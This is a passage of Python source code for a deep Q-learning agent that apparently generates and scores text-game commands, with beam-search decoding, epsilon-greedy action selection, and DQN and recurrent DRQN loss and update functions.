chosen_indices = less_than_epsilon * action_indices_random + greater_than_epsilon * action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics
# choosing from output of beam search (without re-compute some intermediate representations)
def beam_search_choice_act_greedy(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, action_masks = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
chosen_indices = action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
def beam_search_choice_act_random(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, _ = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
chosen_indices = action_indices_random
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
def beam_search_choice_act(self, observation_strings, task_desc_strings, previous_dynamics, random=False):
with torch.no_grad():
if self.mode == "eval":
return self.beam_search_choice_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
if random:
return self.beam_search_choice_act_random(observation_strings, task_desc_strings, previous_dynamics)
batch_size = len(observation_strings)
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, action_masks = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
# random number for epsilon greedy
rand_num = np.random.uniform(low=0.0, high=1.0, size=(batch_size,))
less_than_epsilon = (rand_num < self.epsilon).astype("float32") # batch
greater_than_epsilon = 1.0 - less_than_epsilon
chosen_indices = less_than_epsilon * action_indices_random + greater_than_epsilon * action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
# generating token by token
def command_generation_by_beam_search(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
batch_size = len(observation_strings)
beam_width = self.beam_width
generate_top_k = self.generate_top_k
chosen_actions = []
input_obs = self.get_word_input(observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
if self.recurrent:
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
else:
current_dynamics = None
for b in range(batch_size):
# starts from CLS tokens
__input_target_list = [self.word2id["[CLS]"]]
__input_obs = input_obs[b: b + 1] # 1 x obs_len
__obs_mask = obs_mask[b: b + 1] # 1 x obs_len
__aggregated_obs_representation = aggregated_obs_representation[b: b + 1] # 1 x obs_len x hid
if current_dynamics is not None:
__current_dynamics = current_dynamics[b: b + 1] # 1 x hid
else:
__current_dynamics = None
ended_nodes = []
# starting node - previous node, input target, logp, length
node = BeamSearchNode(None, __input_target_list, 0, 1)
nodes_queue = PriorityQueue()
# start the queue
nodes_queue.put((node.val, node))
queue_size = 1
while(True):
# give up when decoding takes too long
if queue_size > 2000:
break
# fetch the best node
score, n = nodes_queue.get()
__input_target_list = n.input_target
if (n.input_target[-1] == self.word2id["[SEP]"] or n.length >= self.max_target_length) and n.previous_node != None:
ended_nodes.append((score, n))
# if we reached maximum # of sentences required
if len(ended_nodes) >= generate_top_k:
break
else:
continue
input_target = pad_sequences([__input_target_list], dtype='int32')
input_target = to_pt(input_target, self.use_cuda)
target_mask = compute_mask(input_target)
# decode for one step using decoder
pred = self.online_net.decode(input_target, target_mask, __aggregated_obs_representation, __obs_mask, __current_dynamics, __input_obs) # 1 x target_length x vocab
pred = pred[0][-1].cpu()
gt_zero = torch.gt(pred, 0.0).float() # vocab
epsilon = torch.le(pred, 0.0).float() * 1e-8 # vocab
log_pred = torch.log(pred + epsilon) * gt_zero # vocab
top_beam_width_log_probs, top_beam_width_indicies = torch.topk(log_pred, beam_width)
next_nodes = []
for new_k in range(beam_width):
pos = top_beam_width_indicies[new_k]
log_p = top_beam_width_log_probs[new_k].item()
node = BeamSearchNode(n, __input_target_list + [pos], n.log_prob + log_p, n.length + 1)
next_nodes.append((node.val, node))
# put them into queue
for i in range(len(next_nodes)):
score, nn = next_nodes[i]
nodes_queue.put((score, nn))
# increase qsize
queue_size += len(next_nodes) - 1
# choose n best paths
if len(ended_nodes) == 0:
ended_nodes = [nodes_queue.get() for _ in range(generate_top_k)]
utterances = []
for score, n in sorted(ended_nodes, key=operator.itemgetter(0)):
utte = n.input_target
utte_string = self.tokenizer.decode(utte)
utterances.append(utte_string)
utterances = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in utterances]
utterances = [item.replace(" in / on ", " in/on " ) for item in utterances]
chosen_actions.append(utterances)
return chosen_actions, current_dynamics, obs_mask, aggregated_obs_representation
def command_generation_act_greedy(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
batch_size = len(observation_strings)
input_obs = self.get_word_input(observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
if self.recurrent:
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
else:
current_dynamics = None
# greedy generation
input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
eos = np.zeros(batch_size)
for _ in range(self.max_target_length):
input_target = copy.deepcopy(input_target_list)
input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
input_target = to_pt(input_target, self.use_cuda)
target_mask = compute_mask(input_target) # mask of ground truth should be the same
pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, current_dynamics, input_obs) # batch x target_length x vocab
# pointer softmax
pred = to_np(pred[:, -1]) # batch x vocab
pred = np.argmax(pred, -1) # batch
for b in range(batch_size):
new_stuff = [pred[b]] if eos[b] == 0 else []
input_target_list[b] = input_target_list[b] + new_stuff
if pred[b] == self.word2id["[SEP]"]:
eos[b] = 1
if np.sum(eos) == batch_size:
break
chosen_actions = [self.tokenizer.decode(item) for item in input_target_list]
chosen_actions = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in chosen_actions]
chosen_actions = [item.replace(" in / on ", " in/on " ) for item in chosen_actions]
chosen_indices = [item[1:] for item in input_target_list]
for i in range(len(chosen_indices)):
if chosen_indices[i][-1] == self.word2id["[SEP]"]:
chosen_indices[i] = chosen_indices[i][:-1]
return chosen_actions, chosen_indices, current_dynamics
def command_generation_act_random(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
batch_size = len(observation_strings)
beam_width = self.beam_width
generate_top_k = self.generate_top_k
chosen_actions, chosen_indices = [], []
input_obs = self.get_word_input(observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
if self.recurrent:
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
else:
current_dynamics = None
for b in range(batch_size):
# starts from CLS tokens
__input_target_list = [self.word2id["[CLS]"]]
__input_obs = input_obs[b: b + 1] # 1 x obs_len
__obs_mask = obs_mask[b: b + 1] # 1 x obs_len
__aggregated_obs_representation = aggregated_obs_representation[b: b + 1] # 1 x obs_len x hid
if current_dynamics is not None:
__current_dynamics = current_dynamics[b: b + 1] # 1 x hid
else:
__current_dynamics = None
ended_nodes = []
# starting node - previous node, input target, logp, length
node = BeamSearchNode(None, __input_target_list, 0, 1)
nodes_queue = PriorityQueue()
# start the queue
nodes_queue.put((node.val, node))
queue_size = 1
while(True):
# give up when decoding takes too long
if queue_size > 2000:
break
# fetch the best node
score, n = nodes_queue.get()
__input_target_list = n.input_target
if (n.input_target[-1] == self.word2id["[SEP]"] or n.length >= self.max_target_length) and n.previous_node != None:
ended_nodes.append((score, n))
# if we reached maximum # of sentences required
if len(ended_nodes) >= generate_top_k:
break
else:
continue
input_target = pad_sequences([__input_target_list], dtype='int32')
input_target = to_pt(input_target, self.use_cuda)
target_mask = compute_mask(input_target)
# decode for one step using decoder
pred = self.online_net.decode(input_target, target_mask, __aggregated_obs_representation, __obs_mask, __current_dynamics, __input_obs) # 1 x target_length x vocab
pred = pred[0][-1].cpu()
gt_zero = torch.gt(pred, 0.0).float() # vocab
epsilon = torch.le(pred, 0.0).float() * 1e-8 # vocab
log_pred = torch.log(pred + epsilon) * gt_zero # vocab
top_beam_width_log_probs, top_beam_width_indicies = torch.topk(log_pred, beam_width)
next_nodes = []
for new_k in range(beam_width):
pos = top_beam_width_indicies[new_k]
log_p = top_beam_width_log_probs[new_k].item()
node = BeamSearchNode(n, __input_target_list + [pos], n.log_prob + log_p, n.length + 1)
next_nodes.append((node.val, node))
# put them into queue
for i in range(len(next_nodes)):
score, nn = next_nodes[i]
nodes_queue.put((score, nn))
# increase qsize
queue_size += len(next_nodes) - 1
# choose n best paths
if len(ended_nodes) == 0:
ended_nodes = [nodes_queue.get() for _ in range(generate_top_k)]
indicies, utterances = [], []
for score, n in sorted(ended_nodes, key=operator.itemgetter(0)):
utte = n.input_target
utte_string = self.tokenizer.decode(utte)
utterances.append(utte_string)
indicies.append(utte)
utterances = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in utterances]
utterances = [item.replace(" in / on ", " in/on " ) for item in utterances]
indicies = [item[1:] for item in indicies]
for i in range(len(indicies)):
if indicies[i][-1] == self.word2id["[SEP]"]:
indicies[i] = indicies[i][:-1]
# sample one from all generated beams
rand_idx = np.random.choice(len(indicies))
chosen_actions.append(utterances[rand_idx])
chosen_indices.append(indicies[rand_idx])
return chosen_actions, chosen_indices, current_dynamics
def command_generation_act(self, observation_strings, task_desc_strings, previous_dynamics, random=False):
with torch.no_grad():
if self.mode == "eval":
return self.command_generation_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
if random:
return self.command_generation_act_random(observation_strings, task_desc_strings, previous_dynamics)
batch_size = len(observation_strings)
greedy_actions, greedy_indices, greedy_current_dynamics = self.command_generation_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
# random number for epsilon greedy
chosen_actions, chosen_indices, current_dynamics = [], [], []
rand_num = np.random.uniform(low=0.0, high=1.0, size=(batch_size,))
for b in range(batch_size):
if rand_num[b] < self.epsilon:
# random
random_actions, random_indices, random_current_dynamics = self.command_generation_act_random(observation_strings[b: b + 1], task_desc_strings[b: b + 1], None if previous_dynamics is None else previous_dynamics[b: b + 1])
chosen_actions.append(random_actions[0])
chosen_indices.append(random_indices[0])
if self.recurrent:
current_dynamics.append(random_current_dynamics[0])
else:
# greedy
chosen_actions.append(greedy_actions[b])
chosen_indices.append(greedy_indices[b])
if self.recurrent:
current_dynamics.append(greedy_current_dynamics[b])
current_dynamics = torch.stack(current_dynamics, 0) if self.recurrent else None # batch x hidden
return chosen_actions, chosen_indices, current_dynamics
# update: admissible commands
def get_dqn_loss_admissible_commands(self):
"""
Update neural model in agent. In this example we follow algorithm
of updating model in dqn with replay memory.
"""
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
if data is None:
return None, None
obs_list, task_list, candidate_list, action_indices, rewards, next_obs_list, next_candidate_list, actual_ns = data
if self.use_cuda:
rewards = rewards.cuda()
h_obs, obs_mask = self.encode(obs_list, use_model="online")
h_td, td_mask = self.encode(task_list, use_model="online")
action_scores, _, _ = self.action_scoring(candidate_list,
h_obs, obs_mask,
h_td, td_mask,
None,
use_model="online")
# ps_a
action_indices = to_pt(action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
q_value = ez_gather_dim_1(action_scores, action_indices).squeeze(1) # batch
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
h_obs, obs_mask = self.encode(next_obs_list, use_model="online")
next_action_scores, next_action_masks, _ = self.action_scoring(next_candidate_list,
h_obs, obs_mask,
h_td.detach(), td_mask.detach(),
None,
use_model="online")
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks) # batch
next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
# pns # Probabilities p(s_t+n, ·; θtarget)
h_obs, obs_mask = self.encode(next_obs_list, use_model="target")
h_td_t, td_mask_t = self.encode(task_list, use_model="target")
next_action_scores, _, _ = self.action_scoring(next_candidate_list,
h_obs, obs_mask,
h_td_t, td_mask_t,
None,
use_model="target")
# pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1) # batch
discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
rewards = rewards + next_q_value * discount # batch
loss = F.smooth_l1_loss(q_value, rewards)
return loss, q_value
def get_drqn_loss_admissible_commands(self):
"""
Update neural model in agent. In this example we follow algorithm
of updating model in dqn with replay memory.
"""
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
if data is None:
return None, None
seq_obs, task, seq_candidates, seq_chosen_indices, seq_reward, seq_next_obs, seq_next_candidates = data
loss_list, q_value_list = [], []
entropy_list = []
prev_dynamics = None
h_td, td_mask = self.encode(task, use_model="online")
with torch.no_grad():
h_td_t, td_mask_t = self.encode(task, use_model="target")
for step_no in range(self.rl_replay_sample_history_length):
obs, candidates, chosen_indices, reward, next_obs, next_candidates = seq_obs[step_no], seq_candidates[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no], seq_next_candidates[step_no]
if self.use_cuda:
reward = reward.cuda()
h_obs, obs_mask = self.encode(obs, use_model="online")
action_scores, action_masks, current_dynamics = self.action_scoring(candidates, h_obs, obs_mask, h_td, td_mask,
prev_dynamics, use_model="online")
# ps_a
chosen_indices = to_pt(chosen_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
q_value = ez_gather_dim_1(action_scores, chosen_indices).squeeze(1) # batch
prev_dynamics = current_dynamics
if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
q_value = q_value.detach()
prev_dynamics = prev_dynamics.detach()
continue
action_probabilities = (action_scores + (action_masks-1)*999999).softmax(dim=-1) + 0.000001
logp_pi = torch.log(action_probabilities)
# logp_pi = torch.where(torch.isinf(logp_pi),torch.full_like(logp_pi,-999999),logp_pi)
entropy = torch.mean(action_probabilities*logp_pi*action_masks, dim=-1)
entropy_list.append(entropy)
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
h_obs, obs_mask = self.encode(next_obs, use_model="online")
next_action_scores, next_action_masks, _ = self.action_scoring(next_candidates, h_obs, obs_mask, h_td, td_mask,
prev_dynamics, use_model="online")
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks) # batch
next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
# pns # Probabilities p(s_t+n, ·; θtarget)
h_obs, obs_mask = self.encode(next_obs, use_model="target")
next_action_scores, _, _ = self.action_scoring(next_candidates, h_obs, obs_mask, h_td_t, td_mask_t,
prev_dynamics, use_model="target")
# pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1) # batch
reward = reward + next_q_value * self.discount_gamma_game_reward # batch
loss = F.smooth_l1_loss(q_value, reward) # 1
loss_list.append(loss)
q_value_list.append(q_value)
loss = torch.stack(loss_list).mean()
q_value = torch.stack(q_value_list).mean()
entropy_loss = torch.stack(entropy_list).mean()
return loss-0.5*entropy_loss, q_value
def update_dqn_admissible_commands(self):
# update neural model by replaying snapshots in replay memory
if self.recurrent:
dqn_loss, q_value = self.get_drqn_loss_admissible_commands()
else:
dqn_loss, q_value = self.get_dqn_loss_admissible_commands()
if dqn_loss is None:
return None, None
# param_with_grad = [param for param in self.online_net.parameters() if param.requires_grad]
# grad_params = torch.autograd.grad(dqn_loss, param_with_grad, create_graph=True, retain_graph=True, allow_unused=True)
# grad_norm = 0
# for grad in grad_params:
# if grad is not None:
# grad_norm += grad.pow(2).sum()
# # grad_norm = grad_norm.sqrt()
# loss = dqn_loss - grad_norm
# loss = loss.cuda()
# Backpropagate
self.online_net.zero_grad()
self.optimizer.zero_grad()
dqn_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
self.optimizer.step() # apply gradients
return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
# update: beam search choice
def get_dqn_loss_beam_search_choice(self):
"""
Update neural model in agent. In this example we follow algorithm
of updating model in dqn with replay memory.
"""
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
if data is None:
return None, None
obs_list, task_list, candidate_list, action_indices, rewards, next_obs_list, next_candidate_list, actual_ns = data
if self.use_cuda:
rewards = rewards.cuda()
with torch.no_grad():
h_obs, obs_mask = self.encode(obs_list, use_model="online")
h_td, td_mask = self.encode(task_list, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
action_scores, _ = self.beam_search_candidate_scoring(candidate_list, aggregated_obs_representation, obs_mask, None, use_model="online")
# ps_a
action_indices = to_pt(action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
q_value = ez_gather_dim_1(action_scores, action_indices).squeeze(1) # batch
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
h_obs, obs_mask = self.encode(next_obs_list, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
next_action_scores, next_action_masks = self.beam_search_candidate_scoring(next_candidate_list, aggregated_obs_representation, obs_mask, None, use_model="online")
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks) # batch
next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
# pns # Probabilities p(s_t+n, ·; θtarget)
h_obs, obs_mask = self.encode(next_obs_list, use_model="target")
h_td_t, td_mask_t = self.encode(task_list, use_model="target")
aggregated_obs_representation = self.target_net.aggretate_information(h_obs, obs_mask, h_td_t, td_mask_t) # batch x obs_length x hid
next_action_scores, _ = self.beam_search_candidate_scoring(next_candidate_list, aggregated_obs_representation, obs_mask, None, use_model="target")
# pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1) # batch
discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
rewards = rewards + next_q_value * discount # batch
loss = F.smooth_l1_loss(q_value, rewards)
return loss, q_value
def get_drqn_loss_beam_search_choice(self):
"""
Update neural model in agent. In this example we follow algorithm
of updating model in dqn with replay memory.
"""
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
if data is None:
return None, None
seq_obs, task, seq_candidates, seq_chosen_indices, seq_reward, seq_next_obs, seq_next_candidates = data
loss_list, q_value_list = [], []
prev_dynamics = None
with torch.no_grad():
h_td, td_mask = self.encode(task, use_model="online")
h_td_t, td_mask_t = self.encode(task, use_model="target")
for step_no in range(self.rl_replay_sample_history_length):
obs, candidates, chosen_indices, reward, next_obs, next_candidates = seq_obs[step_no], seq_candidates[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no], seq_next_candidates[step_no]
if self.use_cuda:
reward = reward.cuda()
with torch.no_grad():
h_obs, obs_mask = self.encode(obs, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
current_dynamics = self.online_net.rnncell(averaged_representation, prev_dynamics) if prev_dynamics is not None else self.online_net.rnncell(averaged_representation)
action_scores, _ = self.beam_search_candidate_scoring(candidates, aggregated_obs_representation, obs_mask, current_dynamics, use_model="online")
# ps_a
chosen_indices = to_pt(chosen_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
q_value = ez_gather_dim_1(action_scores, chosen_indices).squeeze(1) # batch
prev_dynamics = current_dynamics
if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
q_value = q_value.detach()
prev_dynamics = prev_dynamics.detach()
continue
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
h_obs, obs_mask = self.encode(next_obs, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
next_dynamics = self.online_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.online_net.rnncell(averaged_representation)
next_action_scores, next_action_masks = self.beam_search_candidate_scoring(next_candidates, aggregated_obs_representation, obs_mask, next_dynamics, use_model="online")
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks) # batch
next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
# pns # Probabilities p(s_t+n, ·; θtarget)
h_obs, obs_mask = self.encode(next_obs, use_model="target")
aggregated_obs_representation = self.target_net.aggretate_information(h_obs, obs_mask, h_td_t, td_mask_t) # batch x obs_length x hid
averaged_representation = self.target_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
next_dynamics = self.target_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.target_net.rnncell(averaged_representation)
next_action_scores, _ = self.beam_search_candidate_scoring(next_candidates, aggregated_obs_representation, obs_mask, next_dynamics, use_model="target")
# pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1) # batch
reward = reward + next_q_value * self.discount_gamma_game_reward # batch
loss = F.smooth_l1_loss(q_value, reward) # 1
loss_list.append(loss)
q_value_list.append(q_value)
loss = torch.stack(loss_list).mean()
q_value = torch.stack(q_value_list).mean()
return loss, q_value
def update_dqn_beam_search_choice(self):
# update neural model by replaying snapshots in replay memory
if self.recurrent:
dqn_loss, q_value = self.get_drqn_loss_beam_search_choice()
else:
dqn_loss, q_value = self.get_dqn_loss_beam_search_choice()
if dqn_loss is None:
return None, None
# Backpropagate
self.online_net.zero_grad()
self.optimizer.zero_grad()
dqn_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
self.optimizer.step() # apply gradients
return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
# update: command generation
def get_dqn_loss_command_generation(self):
"""
Update neural model in agent. In this example we follow algorithm
of updating model in dqn with replay memory.
"""
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
if data is None:
return None, None
observation_strings, task_desc_strings, _, action_indices, rewards, next_observation_strings, _, actual_ns = data
batch_size = len(observation_strings)
if self.use_cuda:
rewards = rewards.cuda()
input_target = [[self.word2id["[CLS]"]] + item for item in action_indices]
ground_truth = [item + [self.word2id["[SEP]"]] for item in action_indices]
input_target = self.get_word_input_from_ids(input_target)
ground_truth = self.get_word_input_from_ids(ground_truth)
input_obs = self.get_word_input(observation_strings)
next_input_obs = self.get_word_input(next_observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
target_mask = compute_mask(input_target) # mask of ground truth should be the same
pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, None, input_obs) # batch x target_length x vocab
q_value = GetGenerationQValue(pred * target_mask.unsqueeze(-1), ground_truth, target_mask)
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="online")
next_aggregated_obs_representation = self.online_net.aggretate_information(next_h_obs, next_obs_mask, h_td, td_mask) # batch x obs_length x hid
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
# greedy generation
input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
eos = np.zeros(batch_size)
for _ in range(self.max_target_length):
input_target = copy.deepcopy(input_target_list)
input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
input_target = to_pt(input_target, self.use_cuda)
target_mask = compute_mask(input_target) # mask of ground truth should be the same
pred = self.online_net.decode(input_target, target_mask, next_aggregated_obs_representation, next_obs_mask, None, next_input_obs) # batch x target_length x vocab
# pointer softmax
pred = to_np(pred[:, -1]) # batch x vocab
pred = np.argmax(pred, -1) # batch
for b in range(batch_size):
new_stuff = [pred[b]] if eos[b] == 0 else []
input_target_list[b] = input_target_list[b] + new_stuff
if pred[b] == self.word2id["[SEP]"]:
eos[b] = 1
if np.sum(eos) == batch_size:
break
chosen_indices = [item[1:] for item in input_target_list]
for i in range(len(chosen_indices)):
if chosen_indices[i][-1] == self.word2id["[SEP]"]:
chosen_indices[i] = chosen_indices[i][:-1]
# pns # Probabilities p(s_t+n, ·; θtarget)
next_input_target = [[self.word2id["[CLS]"]] + item for item in chosen_indices]
next_ground_truth = [item + [self.word2id["[SEP]"]] for item in chosen_indices]
next_input_target = self.get_word_input_from_ids(next_input_target)
next_ground_truth = self.get_word_input_from_ids(next_ground_truth)
next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="target")
next_h_td, next_td_mask = self.encode(task_desc_strings, use_model="target")
next_aggregated_obs_representation = self.target_net.aggretate_information(next_h_obs, next_obs_mask, next_h_td, next_td_mask) # batch x obs_length x hid
next_target_mask = compute_mask(next_input_target) # mask of ground truth should be the same
next_pred = self.target_net.decode(next_input_target, next_target_mask, next_aggregated_obs_representation, next_obs_mask, None, next_input_obs) # batch x target_length x vocab
next_q_value = GetGenerationQValue(next_pred * next_target_mask.unsqueeze(-1), next_ground_truth, next_target_mask) # batch
discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
rewards = rewards + next_q_value * discount # batch
loss = F.smooth_l1_loss(q_value, rewards)
return loss, q_value
def get_drqn_loss_command_generation(self):
if len(self.dqn_memory) < self.replay_batch_size:
return None, None
data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
if data is None:
return None, None
seq_obs, task_desc_strings, _, seq_chosen_indices, seq_reward, seq_next_obs, _ = data
batch_size = len(seq_obs[0])
loss_list, q_value_list = [], []
previous_dynamics = None
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
with torch.no_grad():
h_td_t, td_mask_t = self.encode(task_desc_strings, use_model="target")
for step_no in range(self.rl_replay_sample_history_length):
observation_strings, action_indices, reward, next_observation_strings = seq_obs[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no]
if self.use_cuda:
reward = reward.cuda()
input_target = [[self.word2id["[CLS]"]] + item for item in action_indices]
ground_truth = [item + [self.word2id["[SEP]"]] for item in action_indices]
